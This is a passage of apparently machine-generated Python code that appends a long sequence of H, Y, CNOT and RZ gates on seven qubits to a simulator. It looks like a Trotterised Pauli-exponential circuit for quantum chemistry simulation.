sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.3846725, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.746693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.945438, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.899853, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.523242, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.9439592, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.380417, 0))
